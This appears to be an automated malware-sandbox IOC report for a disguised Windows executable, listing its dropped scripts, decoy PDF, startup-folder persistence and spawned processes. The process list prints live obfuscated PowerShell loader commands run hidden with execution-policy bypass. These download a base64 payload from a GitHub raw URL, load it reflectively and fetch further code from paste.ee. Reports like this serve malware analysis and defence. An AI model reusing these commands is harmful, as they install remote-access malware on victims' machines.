IOC Report
copyright_infringement_evidence_1.exe

loading gif

Files

File Path
Type
Category
Malicious
copyright_infringement_evidence_1.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\Public\Documents\2p_bee.js
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\Public\Documents\2x_bee.js
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.js
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat
DOS batch file, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat
DOS batch file, ASCII text
dropped
malicious
C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
PDF document, version 1.7, 3 pages
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
JSON data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c8e50c85-0c43-4cd7-991e-55e29716a4dd.tmp
JSON data
modified
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
data
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
ASCII text
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241008001507Z-161.bmp
PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
SQLite 3.x database, last written using SQLite version 3040000, file counter 4, database pages 14, cookie 0x5, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Certificate, Version=3
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
modified
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\Edit_InApp_Aug2020
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\TESTING
data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json
JSON data
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents
SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
dropped
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journal
SQLite Rollback Journal
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\MSIabffc.LOG
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3g31dsrb.ysj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kwil4bl.ljd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjw4xxbr.a05.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_br2saiv3.kcx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_csuydurb.cmg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d3ubwza3.rbw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dror5mzj.hff.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f10hfybx.jpb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_giu2oqii.aj5.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iso3yttq.z2u.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iufrdab2.bq5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_joajcspy.h0w.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3kcuqgh.0le.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbklbt2t.olx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nfiyh2sf.tgd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_og2pegqo.yb1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pxd2wv.r12.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qcdoznra.f1u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qifqunvw.utq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rf2ffbkq.2ht.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rq02yjah.x5u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sd4hmuvs.xax.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sjovffm4.1sb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnty4i5.d1z.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtdwkjbr.er5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x22xuseb.rxa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x5evwcdl.xfh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xwb0gmve.cnf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxdnudhi.0jb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq3pbw5n.c32.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91wn1q38_ksqaf6_35k.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\A9h51nf7_ksqaf5_35k.tmp
Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-07 20-15-05-350.log
ASCII text, with very long lines (393)
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
ASCII text, with very long lines (393), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\212e41a9-8ff6-4bcc-899f-1e6281ace0eb.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\5cd0f453-9633-47bf-a7ef-39414146bc84.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\c7f821e4-e1de-4fde-8cf2-551cf9ed9bae.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
dropped
C:\Users\user\AppData\Local\Temp\acrocef_low\e2fb0c47-730a-4a0a-9b65-453e10b6385b.tmp
gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
data
dropped
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata
ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators
dropped
There are 77 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\copyright_infringement_evidence_1.exe
"C:\Users\user\Desktop\copyright_infringement_evidence_1.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C start C:\Users\Public\Documents\Benefits-_JD-_Photo-_Video-_UNQILO-_Q4-_2024_Benefits-_JD-_Photo.pdf
malicious
C:\Windows\System32\wscript.exe
"wscript.exe" C:\Users\Public\Documents\2p_bee.js
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
malicious
C:\Windows\System32\wscript.exe
"wscript.exe" C:\Users\Public\Documents\2x_bee.js
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2p_bee.js.bat" "
malicious
C:\Windows\System32\wscript.exe
wscript.exe "C:\Users\Public\Documents\2p_bee.js"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2x_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\2p_bee.js', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sj.JJC.js')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAoACAAJABlAE4AdgA6AGMATwBNAFMAUABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBOACcAJwApACgAIAAoACgAJwB7ADIAfQB1AHIAbAAgAD0AIAB7ADAAJwArACcAfQBoAHQAdAAnACsAJwBwAHMAOgAvAC8AcgBhAHcALgAnACsAJwBnAGkAdABoACcAKwAnAHUAJwArACcAYgB1AHMAZQByACcAKwAnAGMAbwBuAHQAJwArACcAZQBuAHQALgBjAG8AJwArACcAbQAvAE4AJwArACcAbwBEAGUAdABlAGMAJwArACcAdABPACcAKwAnAG4ALwBOAG8ARABlACcAKwAnAHQAZQBjAHQATwBuAC8AJwArACcAcgAnACsAJwBlACcAKwAnAGYAJwArACcAcwAvACcAKwAnAGgAZQAnACsAJwBhAGQAcwAvAG0AYQBpAG4ALwBEACcAKwAnAGUAdAAnACsAJwBhAGgATgBvAHQAZQBfAEoALgB0AHgAdAAnACsAJwB7ADAAfQAnACsAJwA7ACAAJwArACcAewAnACsAJwAyAH0AYgBhAHMAJwArACcAZQA2ADQAQwBvACcAKwAnAG4AJwArACcAdABlAG4AJwArACcAdAAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAJwArACcAIABTACcAKwAnAHkAcwB0ACcAKwAnAGUAbQAnACsAJwAuAE4AZQB0ACcAKwAnAC4AVwAnACsAJwBlACcAKwAnAGIAJwArACcAQwBsAGkAZQAnACsAJwBuACcAKwAnAHQAJwArACcAKQAuACcAKwAnAEQAJwArACcAbwB3AG4AbABvACcAKwAnAGEAJwArACcAZABTAHQAJwArACcAcgAnACsAJwBpACcAKwAnAG4AZwAnACsAJwAoAHsAJwArACcAMgB9AHUAcgBsACkAOwAgACcAKwAnAHsAMgB9AGIAaQAnACsAJwBuAGEAJwArACcAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAA9ACAAWwBTACcAKwAnAHkAcwB0AGUAbQAuACcAKwAnAEMAbwBuAHYAZQByACcAKwAnAHQAXQA6ACcAKwAnADoARgByACcAKwAnAG8AJwArACcAbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAHsAMgB9AGIAYQAnACsAJwBzAGUANgA0ACcAKwAnAEMAJwArACcAbwBuAHQAJwArACcAZQBuAHQAKQAnACsAJwA7ACcAKwAnACAAewAyAH0AJwArACcAYQBzAHMAZQAnACsAJwBtACcAKwAnAGIAJwArACcAbAB5ACAAJwArACcAPQAgAFsAUgBlAGYAJwArACcAbABlACcAKwAnAGMAJwArACcAdABpACcAKwAnAG8AbgAuAEEAcwBzAGUAbQBiACcAKwAnAGwAeQBdADoAOgBMACcAKwAnAG8AYQAnACsAJwBkACcAKwAnACgAewAnACsAJwAyAH0AYgBpAG4AYQAnACsAJwByAHkAJwArACcAQwAnACsAJwBvAG4AdABlAG4AdAApADsAIAB7ADIAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAJwArACcAbgAnACsAJwBkACAAPQAnACsAJwAgAHsAMAB9AFsAJwArACcAZABuAGwAaQBiAC4AJwArACcASQBPAC4ASABvAG0AZQBdADoAOgAnACsAJwBWACcAKwAnAEEASQAoACcAKwAnAHsAJwArACcAMwAnACsAJwB9ADAALwAnACsAJwBLACcAKwAnAFMAQQBjACcAKwAnAEYAJwArACcALwBkACcAKwAnAC8AZQBlAC4AJwArACcAZQB0ACcAKwAnAHMAJwArACcAYQAnACsAJwBwAC8ALwA6AHMAcAB0ACcAKwAnAHQAaAAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzAH0AMQAnACsAJwB7ADMAfQAnACsAJwAsACAAewAzACcAKwAnAH0AJwArACcAQwA6ACcAKwAnAHsAJwArACcAMQAnACsAJwB9AFAAcgBvACcAKwAnAGcAcgAnACsAJwBhAG0ARAAnACsAJwBhACcAKwAnAHQAJwArACcAYQB7ADEAJwArACcAfQB7ACcAKwAnADMAfQAsACAAewAnACsAJwAzACcAKwAnAH0AJwArACcAcgBhACcAKwAnAGoAYQBkAG8AJwArACcAewAzACcAKwAnAH0ALAAgACcAKwAnAHsAMwB9AEEAZAAnACsAJwBkACcAKwAnAEkAbgBQACcAKwAnAHIAbwBjAGUAcwBzADMAMgB7ADMAfQAsACcAKwAnACAAewAzACcAKwAnAH0AJwArACcAZAAnACsAJwBlAHMAJwArACcAYQB0ACcAKwAnAGkAdgBhAGQAbwB7ADMAfQAsACcAKwAnAHsAMwB9ACcAKwAnAHsAMwB9ACkAJwArACcAewAnACsAJwAwAH0AJwArACcAOwAnACsAJwAgAEkAJwArACcAbgB2AG8AawAnACsAJwBlAC0ARQB4ACcAKwAnAHAAJwArACcAcgBlAHMAcwBpAG8AbgAgAHsAMgAnACsAJwB9AGMAbwBtACcAKwAnAG0AJwArACcAYQBuACcAKwAnAGQAJwApACAALQBGACAAWwBjAEgAYQByAF0AMwA5ACwAWwBjAEgAYQByAF0AOQAyACwAWwBjAEgAYQByAF0AMwA2ACwAWwBjAEgAYQByAF0AMwA0ACkAIAApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQwBTAEUAJwArACcAdQByAGwAIAA9ACAAJwArACcASwBrACcAKwAnAHMAJwArACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAAnACsAJwB1AGIAdQBzAGUAcgBjAG8AbgAnACsAJwB0AGUAbgB0AC4AYwBvACcAKwAnAG0ALwBOAG8AJwArACcARABlAHQAZQBjAHQATwBuAC8ATgBvAEQAZQB0AGUAYwAnACsAJwB0AE8AbgAvACcAKwAnAHIAZQBmAHMAJwArACcALwBoAGUAJwArACcAYQBkAHMALwBtAGEAaQAnACsAJwBuAC8ARABlAHQAJwArACcAYQBoAE4AbwB0ACcAKwAnAGUAXwBKAC4AdAB4AHQAJwArACcASwBrACcAKwAnAHMAOwAgAEMAUwAnACsAJwBFAGIAYQBzAGUANgA0ACcAKwAnAEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAIAA9ACAAJwArACcAKABOACcAKwAnAGUAdwAtAE8AYgAnACsAJwBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAJwArACcAbABpACcAKwAnAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwBhAGQAJwArACcAUwB0AHIAJwArACcAaQBuAGcAJwArACcAKABDAFMARQB1AHIAbAApACcAKwAnADsAIABDAFMARQBiAGkAbgBhAHIAeQBDAG8AJwArACcAbgB0AGUAbgB0ACAAPQAgACcAKwAnAFsAUwB5AHMAdABlAG0ALgBDAG8AJwArACcAbgB2AGUAcgB0AF0AOgA6ACcAKwAnAEYAcgBvAG0AQgBhACcAKwAnAHMAZQAnACsAJwA2ADQAJwArACcAUwAnACsAJwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABDAFMARQBiAGEAcwBlADYANABDAG8AbgB0AGUAbgB0ACcAKwAnACkAOwAnACsAJwAgAEMAUwBFAGEAcwBzAGUAbQAnACsAJwBiAGwAeQAgAD0AJwArACcAIABbACcAKwAnAFIAZQAnACsAJwBmAGwAZQBjAHQAJwArACcAaQBvACcAKwAnAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAEMAJwArACcAUwAnACsAJwBFAGIAaQBuACcAKwAnAGEAcgB5AEMAbwBuAHQAZQBuACcAKwAnAHQAKQA7ACAAQwBTAEUAYwAnACsAJwBvAG0AbQAnACsAJwBhAG4AZAAgAD0AIAAnACsAJwBLACcAKwAnAGsAJwArACcAcwBbACcAKwAnAGQAbgBsAGkAYgAuAEkATwAuAEgAJwArACcAbwBtACcAKwAnAGUAXQAnACsAJwA6ADoAVgBBAEkAKABvAE4ASQAwAC8AegBiAEUAdQBjACcAKwAnAC8AZAAvAGUAZQAuACcAKwAnAGUAJwArACcAdABzAGEAcAAvAC8AOgBzAHAAdAB0ACcAKwAnAGgAbwBOACcAKwAnAEkALAAgAG8ATgBJADEAbwBOACcAKwAnAEkALAAgAG8ATgBJAEMAOgAxACcAKwAnAGwAcABQAHIAbwBnACcAKwAnAHIAYQBtAEQAJwArACcAYQB0AGEAMQBsAHAAbwBOAEkALAAgAG8AJwArACcATgAnACsAJwBJAHQAbwBuAGQAaQBuAGgAbwBvAE4ASQAsACAAJwArACcAbwBOAEkAQQAnACsAJwBwAHAATABhAHUAJwArACcAbgBjAGgAbwBOACcAKwAnAEkALAAgAG8AJwArACcATgBJAGQAZQBzAGEAdABpAHYAYQAnACsAJwBkAG8AbwBOAEkAJwArACcALABvAE4ASQBvACcAKwAnAE4ASQApAEsAawBzADsAIABJAG4AdgBvAGsAZQAtAEUAJwArACcAeABwAHIAJwArACcAZQBzAHMAaQAnACsAJwBvACcAKwAnAG4AJwArACcAIABDACcAKwAnAFMARQBjAG8AbQBtAGEAbgBkACcAKQAgAC0AYwBSAEUAUABsAEEAQwBlACAAIAAoAFsAQwBIAEEAcgBdADYANwArAFsAQwBIAEEAcgBdADgAMwArAFsAQwBIAEEAcgBdADYAOQApACwAWwBDAEgAQQByAF0AMwA2ACAALQBjAFIARQBQAGwAQQBDAGUAIAAoAFsAQwBIAEEAcgBdADEAMQAxACsAWwBDAEgAQQByAF0ANwA4ACsAWwBDAEgAQQByAF0ANwAzACkALABbAEMASABBAHIAXQAzADQALQBjAFIARQBQAGwAQQBDAGUAIAAgACcASwBrAHMAJwAsAFsAQwBIAEEAcgBdADMAOQAgACAALQBSAGUAcABsAEEAYwBlACAAKABbAEMASABBAHIAXQA0ADkAKwBbAEMASABBAHIAXQAxADAAOAArAFsAQwBIAEEAcgBdADEAMQAyACkALABbAEMASABBAHIAXQA5ADIAKQAgAHwAaQBlAHgA';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $eNv:cOMSPEc[4,15,25]-JoIN'')( (('{2}url = {0'+'}htt'+'ps://raw.'+'gith'+'u'+'buser'+'cont'+'ent.co'+'m/N'+'oDetec'+'tO'+'n/NoDe'+'tectOn/'+'r'+'e'+'f'+'s/'+'he'+'ads/main/D'+'et'+'ahNote_J.txt'+'{0}'+'; '+'{'+'2}bas'+'e64Co'+'n'+'ten'+'t = (New-Object'+' S'+'yst'+'em'+'.Net'+'.W'+'e'+'b'+'Clie'+'n'+'t'+').'+'D'+'ownlo'+'a'+'dSt'+'r'+'i'+'ng'+'({'+'2}url); '+'{2}bi'+'na'+'ryCon'+'tent = [S'+'ystem.'+'Conver'+'t]:'+':Fr'+'o'+'mBase64String({2}ba'+'se64'+'C'+'ont'+'ent)'+';'+' {2}'+'asse'+'m'+'b'+'ly '+'= [Ref'+'le'+'c'+'ti'+'on.Assemb'+'ly]::L'+'oa'+'d'+'({'+'2}bina'+'ry'+'C'+'ontent); {2}'+'c'+'omma'+'n'+'d ='+' {0}['+'dnlib.'+'IO.Home]::'+'V'+'AI('+'{'+'3'+'}0/'+'K'+'SAc'+'F'+'/d'+'/ee.'+'et'+'s'+'a'+'p//:spt'+'th'+'{3}'+', {3}1'+'{3}'+', {3'+'}'+'C:'+'{'+'1'+'}Pro'+'gr'+'amD'+'a'+'t'+'a{1'+'}{'+'3}, {'+'3'+'}'+'ra'+'jado'+'{3'+'}, '+'{3}Ad'+'d'+'InP'+'rocess32{3},'+' {3'+'}'+'d'+'es'+'at'+'ivado{3},'+'{3}'+'{3})'+'{'+'0}'+';'+' I'+'nvok'+'e-Ex'+'p'+'ression {2'+'}com'+'m'+'an'+'d') -F [cHar]39,[cHar]92,[cHar]36,[cHar]34) )"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('CSE'+'url = '+'Kk'+'s'+'https://raw.gith'+'ubusercon'+'tent.co'+'m/No'+'DetectOn/NoDetec'+'tOn/'+'refs'+'/he'+'ads/mai'+'n/Det'+'ahNot'+'e_J.txt'+'Kk'+'s; CS'+'Ebase64'+'Cont'+'e'+'nt = '+'(N'+'ew-Ob'+'ject System.Net.WebC'+'li'+'ent).D'+'ownload'+'Str'+'ing'+'(CSEurl)'+'; CSEbinaryCo'+'ntent = '+'[System.Co'+'nvert]::'+'FromBa'+'se'+'64'+'S'+'tr'+'i'+'ng(CSEbase64Content'+');'+' CSEassem'+'bly ='+' ['+'Re'+'flect'+'io'+'n.Assembly]::Load(C'+'S'+'Ebin'+'aryConten'+'t); CSEc'+'omm'+'and = '+'K'+'k'+'s['+'dnlib.IO.H'+'om'+'e]'+'::VAI(oNI0/zbEuc'+'/d/ee.'+'e'+'tsap//:sptt'+'hoN'+'I, oNI1oN'+'I, oNIC:1'+'lpProg'+'ramD'+'ata1lpoNI, o'+'N'+'ItondinhooNI, '+'oNIA'+'ppLau'+'nchoN'+'I, o'+'NIdesativa'+'dooNI'+',oNIo'+'NI)Kks; Invoke-E'+'xpr'+'essi'+'o'+'n'+' C'+'SEcommand') -cREPlACe ([CHAr]67+[CHAr]83+[CHAr]69),[CHAr]36 -cREPlACe ([CHAr]111+[CHAr]78+[CHAr]73),[CHAr]34-cREPlACe 'Kks',[CHAr]39 -ReplAce ([CHAr]49+[CHAr]108+[CHAr]112),[CHAr]92) |iex"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_2x_bee.js.bat" "
malicious
C:\Windows\System32\wscript.exe
wscript.exe "C:\Users\Public\Documents\2x_bee.js"
malicious
C:\Windows\System32\cmd.exe
